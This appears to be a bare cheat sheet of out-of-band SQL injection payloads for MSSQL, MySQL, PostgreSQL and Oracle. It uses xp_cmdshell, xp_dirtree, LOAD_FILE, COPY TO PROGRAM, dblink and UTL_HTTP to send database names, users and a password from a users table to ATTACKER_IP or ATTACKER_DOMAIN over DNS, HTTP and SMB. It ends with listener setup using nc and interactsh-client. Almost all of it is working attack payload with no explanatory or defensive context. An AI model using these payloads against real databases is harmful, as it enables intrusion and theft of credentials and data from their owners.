Out-of-Band (OOB)

'; DECLARE @d varchar(1024); SET @d=(SELECT DB_NAME()); EXEC('master..xp_dirtree "\\'+@d+'.ATTACKER_DOMAIN\\x"')-- -

'; EXEC xp_cmdshell 'nslookup data.ATTACKER_DOMAIN'-- -
'; EXEC xp_cmdshell 'curl http://ATTACKER_IP/?data=test'-- -

'; DECLARE @o int; EXEC sp_OACreate 'MSXML2.XMLHTTP',@o OUT; EXEC sp_OAMethod @o,'open',NULL,'GET','http://ATTACKER_IP/?d='+DB_NAME(),false; EXEC sp_OAMethod @o,'send';-- -

' UNION SELECT LOAD_FILE(CONCAT('\\\\',database(),'.ATTACKER_DOMAIN\\x'))-- -
' UNION SELECT LOAD_FILE(CONCAT('\\\\',
  (SELECT password FROM users LIMIT 1),
  '.ATTACKER_DOMAIN\\x'))-- -

' UNION SELECT 'data' INTO OUTFILE '\\\\ATTACKER_IP\\share\\out.txt'-- -

'; COPY (SELECT current_database()) TO PROGRAM 'curl http://ATTACKER_IP/?d=$(cat /dev/stdin)'-- -

'; SELECT dblink_connect('host=ATTACKER_IP dbname='||current_database())-- -

CREATE EXTENSION IF NOT EXISTS dblink;
SELECT dblink_connect('host='||current_database()||'.ATTACKER_DOMAIN user=x dbname=x');

' UNION SELECT UTL_HTTP.REQUEST('http://ATTACKER_IP/?d='||(SELECT user FROM dual)) FROM dual-- -

' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.ATTACKER_DOMAIN')-- -

' UNION SELECT HTTPURITYPE('http://ATTACKER_IP/?d='||(SELECT user FROM dual)).GETCLOB() FROM dual-- -

interactsh-client

python3 -m http.server 8000
nc -lvnp 80

# Install
go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Run
interactsh-client
# Gives you: abc123.interact.sh